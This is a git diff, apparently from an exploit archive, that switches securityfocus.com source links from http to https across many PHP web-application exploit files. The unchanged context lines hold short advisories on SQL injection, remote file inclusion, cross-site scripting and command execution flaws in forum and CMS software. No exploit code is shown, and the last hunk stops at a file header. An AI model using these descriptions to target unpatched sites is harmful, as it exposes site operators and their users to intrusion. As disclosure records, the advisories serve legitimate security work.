b/exploits/php/webapps/22252.txt index de36b8103..d85909de8 100644 --- a/exploits/php/webapps/22252.txt +++ b/exploits/php/webapps/22252.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6862/info +source: https://www.securityfocus.com/bid/6862/info php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to php-board user and administrative passwords. diff --git a/exploits/php/webapps/22253.txt b/exploits/php/webapps/22253.txt index 4d9dde627..32b2a97ac 100644 --- a/exploits/php/webapps/22253.txt +++ b/exploits/php/webapps/22253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6866/info +source: https://www.securityfocus.com/bid/6866/info The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/22254.txt b/exploits/php/webapps/22254.txt index 9af414b1c..c5f6adb86 100644 --- a/exploits/php/webapps/22254.txt +++ b/exploits/php/webapps/22254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6867/info +source: https://www.securityfocus.com/bid/6867/info The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/22256.txt b/exploits/php/webapps/22256.txt index 5d52134f9..90cea08cb 100644 --- a/exploits/php/webapps/22256.txt +++ b/exploits/php/webapps/22256.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6879/info +source: https://www.securityfocus.com/bid/6879/info D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts. diff --git a/exploits/php/webapps/22257.txt b/exploits/php/webapps/22257.txt index c5b831925..f9ac27b63 100644 --- a/exploits/php/webapps/22257.txt +++ b/exploits/php/webapps/22257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6879/info +source: https://www.securityfocus.com/bid/6879/info D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts. diff --git a/exploits/php/webapps/22266.php b/exploits/php/webapps/22266.php index b521b3b37..fafc6daed 100644 --- a/exploits/php/webapps/22266.php +++ b/exploits/php/webapps/22266.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6887/info +source: https://www.securityfocus.com/bid/6887/info It has been reported that the search module distributed with PHPNuke is vulnerable to an SQL injection attack. diff --git a/exploits/php/webapps/22267.php b/exploits/php/webapps/22267.php index bbea83a6f..c233d7f1f 100644 --- a/exploits/php/webapps/22267.php +++ b/exploits/php/webapps/22267.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6888/info +source: https://www.securityfocus.com/bid/6888/info A SQL injection vulnerability has been reported in phpBB2. diff --git a/exploits/php/webapps/22268.txt b/exploits/php/webapps/22268.txt index ea251cd5e..5fb6f3213 100644 --- a/exploits/php/webapps/22268.txt +++ b/exploits/php/webapps/22268.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6892/info +source: https://www.securityfocus.com/bid/6892/info Reportedly, myPHPNuke 'links.php' does not adequately filter HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. All code will be executed within the context of the website running myPHPNuke. diff --git a/exploits/php/webapps/22277.txt b/exploits/php/webapps/22277.txt index 476c49d14..229d097be 100644 --- a/exploits/php/webapps/22277.txt +++ b/exploits/php/webapps/22277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6917/info +source: https://www.securityfocus.com/bid/6917/info A vulnerability has been discovered in Nuked-Klan which may be exploited to execute certain PHP functions on a target server. This issue occurs in the 'Team', 'News', and 'Lien' modules and is due to insufficient sanitization of user-supplied URI parameters. diff --git a/exploits/php/webapps/22279.txt b/exploits/php/webapps/22279.txt index b9a0d2afa..50752a008 100644 --- a/exploits/php/webapps/22279.txt +++ b/exploits/php/webapps/22279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6922/info +source: https://www.securityfocus.com/bid/6922/info GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders. diff --git a/exploits/php/webapps/22281.php b/exploits/php/webapps/22281.php index 86b26b20e..a2d9d2cd5 100644 --- a/exploits/php/webapps/22281.php +++ b/exploits/php/webapps/22281.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6926/info +source: https://www.securityfocus.com/bid/6926/info Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie. diff --git a/exploits/php/webapps/22282.txt b/exploits/php/webapps/22282.txt index 8e78002e7..d4d38a846 100644 --- a/exploits/php/webapps/22282.txt +++ b/exploits/php/webapps/22282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6929/info +source: https://www.securityfocus.com/bid/6929/info A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers. diff --git a/exploits/php/webapps/22283.txt b/exploits/php/webapps/22283.txt index 777aece5b..76e715877 100644 --- a/exploits/php/webapps/22283.txt +++ b/exploits/php/webapps/22283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22284.txt b/exploits/php/webapps/22284.txt index e43040e86..e9a0dc1c6 100644 --- a/exploits/php/webapps/22284.txt +++ b/exploits/php/webapps/22284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22285.txt b/exploits/php/webapps/22285.txt index 8e3ec8418..df2caca26 100644 --- a/exploits/php/webapps/22285.txt +++ b/exploits/php/webapps/22285.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22293.txt b/exploits/php/webapps/22293.txt index 34e8f1735..e96607215 100644 --- a/exploits/php/webapps/22293.txt +++ b/exploits/php/webapps/22293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6970/info +source: https://www.securityfocus.com/bid/6970/info E-theni may allow inclusion of malicious remote files. This is due to remote users being able to influence the include path of an external file ('para_langue.php') referenced by the 'aff_liste_langue.php' script. This could result in arbitrary command execution. diff --git a/exploits/php/webapps/22295.txt b/exploits/php/webapps/22295.txt index 2a1b2508e..b27129847 100644 --- a/exploits/php/webapps/22295.txt +++ b/exploits/php/webapps/22295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6976/info +source: https://www.securityfocus.com/bid/6976/info Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22297.pl b/exploits/php/webapps/22297.pl index 02976e847..613081b81 100755 --- a/exploits/php/webapps/22297.pl +++ b/exploits/php/webapps/22297.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6982/info +source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be useful in mounting further attacks against the host system. diff --git a/exploits/php/webapps/22298.txt b/exploits/php/webapps/22298.txt index 71526538d..ad35649ec 100644 --- a/exploits/php/webapps/22298.txt 
+++ b/exploits/php/webapps/22298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6984/info +source: https://www.securityfocus.com/bid/6984/info TYPO3 is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22315.pl b/exploits/php/webapps/22315.pl index 7d6d055a6..3f3916322 100755 --- a/exploits/php/webapps/22315.pl +++ b/exploits/php/webapps/22315.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6993/info +source: https://www.securityfocus.com/bid/6993/info Clients of TYPO3 systems may access potentially sensitive data that have been obfuscated through hidden form fields. This may aid in exploiting other known issues in the software. diff --git a/exploits/php/webapps/22316.pl b/exploits/php/webapps/22316.pl index 312d81c7a..41d15c130 100755 --- a/exploits/php/webapps/22316.pl +++ b/exploits/php/webapps/22316.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6993/info +source: https://www.securityfocus.com/bid/6993/info Clients of TYPO3 systems may access potentially sensitive data that have been obfuscated through hidden form fields. This may aid in exploiting other known issues in the software. diff --git a/exploits/php/webapps/22317.txt b/exploits/php/webapps/22317.txt index f164e6697..86c89cf6e 100644 --- a/exploits/php/webapps/22317.txt +++ b/exploits/php/webapps/22317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6998/info +source: https://www.securityfocus.com/bid/6998/info GTCatalog is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22318.txt b/exploits/php/webapps/22318.txt index 4814e4dbb..1f0afce42 100644 --- a/exploits/php/webapps/22318.txt +++ b/exploits/php/webapps/22318.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7000/info +source: https://www.securityfocus.com/bid/7000/info Webchat is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22336.txt b/exploits/php/webapps/22336.txt index ec7b78857..036a39e5d 100644 --- a/exploits/php/webapps/22336.txt +++ b/exploits/php/webapps/22336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7030/info +source: https://www.securityfocus.com/bid/7030/info A vulnerability has been reported in PHPPing that may allow remote attackers to execute commands on vulnerable systems. diff --git a/exploits/php/webapps/22339.txt b/exploits/php/webapps/22339.txt index 2c0a870e6..8b168369a 100644 --- a/exploits/php/webapps/22339.txt +++ b/exploits/php/webapps/22339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7045/info +source: https://www.securityfocus.com/bid/7045/info SimpleBBS reportedly creates sensitive files with world-readable permissions. As a result anyone who has access to SimpleBBS web resources may access confidential information stored in the SimpleBBS user database. diff --git a/exploits/php/webapps/22343.txt b/exploits/php/webapps/22343.txt index 7852c0589..95e58c3e0 100644 --- a/exploits/php/webapps/22343.txt +++ b/exploits/php/webapps/22343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7063/info +source: https://www.securityfocus.com/bid/7063/info A vulnerability has been reported for VPOPMail that may allow attackers to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/22347.txt b/exploits/php/webapps/22347.txt index e0034e9b6..103381e52 100644 --- a/exploits/php/webapps/22347.txt +++ b/exploits/php/webapps/22347.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7078/info +source: https://www.securityfocus.com/bid/7078/info The AvantGo module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22348.txt b/exploits/php/webapps/22348.txt index 62f006443..4a2691f98 100644 --- a/exploits/php/webapps/22348.txt +++ b/exploits/php/webapps/22348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7079/info +source: https://www.securityfocus.com/bid/7079/info The News module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22349.txt b/exploits/php/webapps/22349.txt index 2bef886a6..547dc073c 100644 --- a/exploits/php/webapps/22349.txt +++ b/exploits/php/webapps/22349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7080/info +source: https://www.securityfocus.com/bid/7080/info The Splatt Forum module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22378.txt b/exploits/php/webapps/22378.txt index 6d3a8d1ad..7cde82cc5 100644 --- a/exploits/php/webapps/22378.txt +++ b/exploits/php/webapps/22378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7126/info +source: https://www.securityfocus.com/bid/7126/info MyABraCaDaWeb is reported to disclose path information in error messages when handling some invalid requests. This information could be useful in further attacks against a system hosting the software. diff --git a/exploits/php/webapps/22382.txt b/exploits/php/webapps/22382.txt index dbde138d6..b313ded19 100644 --- a/exploits/php/webapps/22382.txt +++ b/exploits/php/webapps/22382.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7135/info +source: https://www.securityfocus.com/bid/7135/info Mambo Site Server has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/22383.txt b/exploits/php/webapps/22383.txt index 624053dd2..79ae9c90f 100644 --- a/exploits/php/webapps/22383.txt +++ b/exploits/php/webapps/22383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7139/info +source: https://www.securityfocus.com/bid/7139/info A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit the vulnerability by creating a specially crafted URL that includes malicious HTML code as URI parameters for Basit's Submit module. diff --git a/exploits/php/webapps/22385.txt b/exploits/php/webapps/22385.txt index 5d2fce364..edb2d7918 100644 --- a/exploits/php/webapps/22385.txt +++ b/exploits/php/webapps/22385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7142/info +source: https://www.securityfocus.com/bid/7142/info A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit the vulnerability by creating a specially crafted URL that includes malicious HTML code as URI parameters for Basit's Search module. diff --git a/exploits/php/webapps/22386.txt b/exploits/php/webapps/22386.txt index f2e46c378..a0b260d29 100644 --- a/exploits/php/webapps/22386.txt +++ b/exploits/php/webapps/22386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7143/info +source: https://www.securityfocus.com/bid/7143/info Siteframe has been reported vulnerable to an information disclosure vulnerability. diff --git a/exploits/php/webapps/22387.txt b/exploits/php/webapps/22387.txt index 201f02f88..7aed0a9f6 100644 
--- a/exploits/php/webapps/22387.txt +++ b/exploits/php/webapps/22387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7144/info +source: https://www.securityfocus.com/bid/7144/info It has been reported that DCP-Portal does not sufficiently filter URI parameters supplied to the DCP-Portal 'calender' script. diff --git a/exploits/php/webapps/22389.txt b/exploits/php/webapps/22389.txt index 7cd93a7d6..a56e545ba 100644 --- a/exploits/php/webapps/22389.txt +++ b/exploits/php/webapps/22389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7149/info +source: https://www.securityfocus.com/bid/7149/info XOOPS has been reported vulnerable to an information disclosure vulnerability. According to the report, path information and other sensitive data may be output in server error messages. Information obtained in this manner may be used by an attacker to launch further attacks against a vulnerable system. This vulnerability was reported to affect XOOPS version 2.0. It is not currently known if other versions are affected. diff --git a/exploits/php/webapps/22391.txt b/exploits/php/webapps/22391.txt index ad6497a79..59fae8d95 100644 --- a/exploits/php/webapps/22391.txt +++ b/exploits/php/webapps/22391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7151/info +source: https://www.securityfocus.com/bid/7151/info It has been reported that osCommerce does not sufficiently filter URI parameters supplied to multiple osCommerce scripts. diff --git a/exploits/php/webapps/22392.txt b/exploits/php/webapps/22392.txt index 7618451b7..40f31bc68 100644 --- a/exploits/php/webapps/22392.txt +++ b/exploits/php/webapps/22392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7153/info +source: https://www.securityfocus.com/bid/7153/info It has been reported that osCommerce does not sufficiently filter URI parameters supplied to multiple osCommerce scripts. 
diff --git a/exploits/php/webapps/22393.txt b/exploits/php/webapps/22393.txt index 87925bd0c..efb713a68 100644 --- a/exploits/php/webapps/22393.txt +++ b/exploits/php/webapps/22393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7155/info +source: https://www.securityfocus.com/bid/7155/info Error output is not sufficiently sanitized of HTML and script code by osCommerce. This may allow for cross-site scripting attacks as remote users could create a malicious link to a site hosting osCommerce which contains hostile HTML and script code. When a such a link is visited, attacker-supplied code could be interpreted in the web client of the user. diff --git a/exploits/php/webapps/22411.txt b/exploits/php/webapps/22411.txt index 6a5523cd1..59182cd7c 100644 --- a/exploits/php/webapps/22411.txt +++ b/exploits/php/webapps/22411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7170/info +source: https://www.securityfocus.com/bid/7170/info It has been reported that an input validation error exists in the banners.php file included with PHPNuke. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and potentially access sensitive information, then download it via the web. diff --git a/exploits/php/webapps/22412.txt b/exploits/php/webapps/22412.txt index 7b4e6712d..a8cdb1fed 100644 --- a/exploits/php/webapps/22412.txt +++ b/exploits/php/webapps/22412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7171/info +source: https://www.securityfocus.com/bid/7171/info It has been reported that an information disclosure vulnerability exists in Advanced Poll. Because of this, a remote user to potentially access privileged information that could lead to further attack against the host and it's users. diff --git a/exploits/php/webapps/22413.txt b/exploits/php/webapps/22413.txt index 2ed09cecf..ecf240064 100644 --- a/exploits/php/webapps/22413.txt 
+++ b/exploits/php/webapps/22413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7172/info +source: https://www.securityfocus.com/bid/7172/info It has been reported that an input validation error exists in the article.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and gain unauthorized access to user accounts. diff --git a/exploits/php/webapps/22414.php b/exploits/php/webapps/22414.php index 02afaff0e..09bb60a4c 100644 --- a/exploits/php/webapps/22414.php +++ b/exploits/php/webapps/22414.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7173/info +source: https://www.securityfocus.com/bid/7173/info It has been reported that an input validation error exists in the index.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database and alter information on articles posted on the site. diff --git a/exploits/php/webapps/22421.txt b/exploits/php/webapps/22421.txt index 5011120ff..64382a002 100644 --- a/exploits/php/webapps/22421.txt +++ b/exploits/php/webapps/22421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7190/info +source: https://www.securityfocus.com/bid/7190/info It has been reported that Web Chat Manager is prone to HTML injection attacks. This problem occurs due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/22422.txt b/exploits/php/webapps/22422.txt index cee0c8661..4c3c1266e 100644 --- a/exploits/php/webapps/22422.txt +++ b/exploits/php/webapps/22422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7191/info +source: https://www.securityfocus.com/bid/7191/info PHP-Nuke has been reported prone to a file disclosure vulnerability when using the viewpage.php addon. 
diff --git a/exploits/php/webapps/22423.txt b/exploits/php/webapps/22423.txt index 853e0a62a..f0ef593b0 100644 --- a/exploits/php/webapps/22423.txt +++ b/exploits/php/webapps/22423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7193/info +source: https://www.securityfocus.com/bid/7193/info It has been reported that an input validation error exists in the 'viewtopic.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. diff --git a/exploits/php/webapps/22424.txt b/exploits/php/webapps/22424.txt index bcfceefcd..038f2919b 100644 --- a/exploits/php/webapps/22424.txt +++ b/exploits/php/webapps/22424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7194/info +source: https://www.securityfocus.com/bid/7194/info It has been reported that an input validation error exists in the 'viewforum.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. diff --git a/exploits/php/webapps/22438.txt b/exploits/php/webapps/22438.txt index 7d334f67b..f9b73db1a 100644 --- a/exploits/php/webapps/22438.txt +++ b/exploits/php/webapps/22438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7218/info +source: https://www.securityfocus.com/bid/7218/info Multiple path disclosure vulnerabilities have been reported in various PHP scripts used by PHP-Nuke. The issue occurs when an invalid URI parameter is passed to certain scripts. The affected scripts do not provide sufficient error handling for this circumstance and as such, may display an error page containing sensitive information path information. 
diff --git a/exploits/php/webapps/22439.txt b/exploits/php/webapps/22439.txt index 97d4f1b08..9a8ce5709 100644 --- a/exploits/php/webapps/22439.txt +++ b/exploits/php/webapps/22439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7218/info +source: https://www.securityfocus.com/bid/7218/info Multiple path disclosure vulnerabilities have been reported in various PHP scripts used by PHP-Nuke. The issue occurs when an invalid URI parameter is passed to certain scripts. The affected scripts do not provide sufficient error handling for this circumstance and as such, may display an error page containing sensitive information path information. diff --git a/exploits/php/webapps/22443.txt b/exploits/php/webapps/22443.txt index 38d9351b4..9e57d65d9 100644 --- a/exploits/php/webapps/22443.txt +++ b/exploits/php/webapps/22443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7232/info +source: https://www.securityfocus.com/bid/7232/info A vulnerability has been reported for Guestbook that may allow remote attackers to obtain unauthorized access to administrative functions. diff --git a/exploits/php/webapps/22444.txt b/exploits/php/webapps/22444.txt index 8392b6252..769cbd37b 100644 --- a/exploits/php/webapps/22444.txt +++ b/exploits/php/webapps/22444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7234/info +source: https://www.securityfocus.com/bid/7234/info A path disclosure vulnerability has been reported for Guestbook. The issue occurs when a request is made to the cfooter.php3 PHP script page. diff --git a/exploits/php/webapps/22445.txt b/exploits/php/webapps/22445.txt index c4d50a75e..ff6d7a400 100644 --- a/exploits/php/webapps/22445.txt +++ b/exploits/php/webapps/22445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7236/info +source: https://www.securityfocus.com/bid/7236/info A path disclosure vulnerability has been reported for ScozBook. The issue occurs when a request is made to the view.php script page. 
diff --git a/exploits/php/webapps/22451.txt b/exploits/php/webapps/22451.txt index de4565f2e..004f293e6 100644 --- a/exploits/php/webapps/22451.txt +++ b/exploits/php/webapps/22451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7262/info +source: https://www.securityfocus.com/bid/7262/info It has been reported that it is possible to inject script code into the subject of a message in Phorum. This may be done by constructing a malicious subject line (or other fields) before sending an email to the target victim. diff --git a/exploits/php/webapps/22457.txt b/exploits/php/webapps/22457.txt index 6fad2d7db..2c702e8e5 100644 --- a/exploits/php/webapps/22457.txt +++ b/exploits/php/webapps/22457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7275/info +source: https://www.securityfocus.com/bid/7275/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. diff --git a/exploits/php/webapps/22459.txt b/exploits/php/webapps/22459.txt index b80e319ab..7c97c7728 100644 --- a/exploits/php/webapps/22459.txt +++ b/exploits/php/webapps/22459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7286/info +source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. diff --git a/exploits/php/webapps/22461.txt b/exploits/php/webapps/22461.txt index 565c83e83..f3e2e65bf 100644 --- a/exploits/php/webapps/22461.txt +++ b/exploits/php/webapps/22461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7290/info +source: https://www.securityfocus.com/bid/7290/info An input validation error has been reported in Invision Board which may result in the manipulation of SQL queries. This vulnerability exists in the functions.php script file. diff --git a/exploits/php/webapps/22473.txt b/exploits/php/webapps/22473.txt index aadf83f26..17dadcb5b 100644 --- a/exploits/php/webapps/22473.txt +++ b/exploits/php/webapps/22473.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7300/info +source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. diff --git a/exploits/php/webapps/22474.txt b/exploits/php/webapps/22474.txt index 1d3373af6..5ccf6864b 100644 --- a/exploits/php/webapps/22474.txt +++ b/exploits/php/webapps/22474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7301/info +source: https://www.securityfocus.com/bid/7301/info A vulnerability has been reported for Py-Membres 4.0 that allows remote attackers to modify the logic of SQL queries. diff --git a/exploits/php/webapps/22477.txt b/exploits/php/webapps/22477.txt index 8abdbfae6..5bf33a7c0 100644 --- a/exploits/php/webapps/22477.txt +++ b/exploits/php/webapps/22477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7309/info +source: https://www.securityfocus.com/bid/7309/info phPay has been reported prone to multiple path disclosure vulnerabilities. diff --git a/exploits/php/webapps/22478.txt b/exploits/php/webapps/22478.txt index c717b8ff9..fbf8c46fa 100644 --- a/exploits/php/webapps/22478.txt +++ b/exploits/php/webapps/22478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7310/info +source: https://www.securityfocus.com/bid/7310/info It has been reported that user-supplied input to phPay is not sufficiently sanitized. This lack of sanitization provides an opportunity for an attacker to launch cross-site scripting attacks. diff --git a/exploits/php/webapps/22491.txt b/exploits/php/webapps/22491.txt index d8ffaf33f..f1c01e78d 100644 --- a/exploits/php/webapps/22491.txt +++ b/exploits/php/webapps/22491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7348/info +source: https://www.securityfocus.com/bid/7348/info Several cross site scripting vulnerabilities have been reported for eZ Publish. These vulnerabilities are due to insufficient sanitization of user-supplied data submitted to eZ Publish. 
diff --git a/exploits/php/webapps/22492.txt b/exploits/php/webapps/22492.txt index a3ffae58d..d17195782 100644 --- a/exploits/php/webapps/22492.txt +++ b/exploits/php/webapps/22492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7349/info +source: https://www.securityfocus.com/bid/7349/info Several path disclosure vulnerabilities have been reported for eZ Publish. An attacker can exploit this vulnerability by making a HTTP request for any of the affected pages. This may result in a condition where path information is returned to the attacker. diff --git a/exploits/php/webapps/22498.txt b/exploits/php/webapps/22498.txt index 9b37f9021..41605c0d6 100644 --- a/exploits/php/webapps/22498.txt +++ b/exploits/php/webapps/22498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7357/info +source: https://www.securityfocus.com/bid/7357/info osCommerce has been reported prone to authentication bypass vulnerability. diff --git a/exploits/php/webapps/22501.txt b/exploits/php/webapps/22501.txt index 3ca8ed8dd..afee8bfed 100644 --- a/exploits/php/webapps/22501.txt +++ b/exploits/php/webapps/22501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7365/info +source: https://www.securityfocus.com/bid/7365/info A vulnerability has been reported for Xonic.ru News. The problem occurs due to insufficient sanitization of user-supplied data to the 'script.php' file. As a result, it may be possible for an attacker to pass malicious PHP or shell commands in requests to a target server. All commands would be executed on the system with the privileges of the vulnerable application. diff --git a/exploits/php/webapps/22517.txt b/exploits/php/webapps/22517.txt index 3c3b202ec..0e977a6c4 100644 --- a/exploits/php/webapps/22517.txt +++ b/exploits/php/webapps/22517.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7401/info +source: https://www.securityfocus.com/bid/7401/info It has been reported that OpenBB does not properly check input passed via the 'index.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22519.txt b/exploits/php/webapps/22519.txt index 38205bd84..0615f1bcd 100644 --- a/exploits/php/webapps/22519.txt +++ b/exploits/php/webapps/22519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7404/info +source: https://www.securityfocus.com/bid/7404/info It has been reported that OpenBB does not properly check input passed via the 'board.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22520.txt b/exploits/php/webapps/22520.txt index 7460a01b5..cfa760cb2 100644 --- a/exploits/php/webapps/22520.txt +++ b/exploits/php/webapps/22520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7405/info +source: https://www.securityfocus.com/bid/7405/info It has been reported that OpenBB does not properly check input passed via the 'member.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22521.c b/exploits/php/webapps/22521.c index f9940b6ed..f44526e56 100644 --- a/exploits/php/webapps/22521.c +++ b/exploits/php/webapps/22521.c 
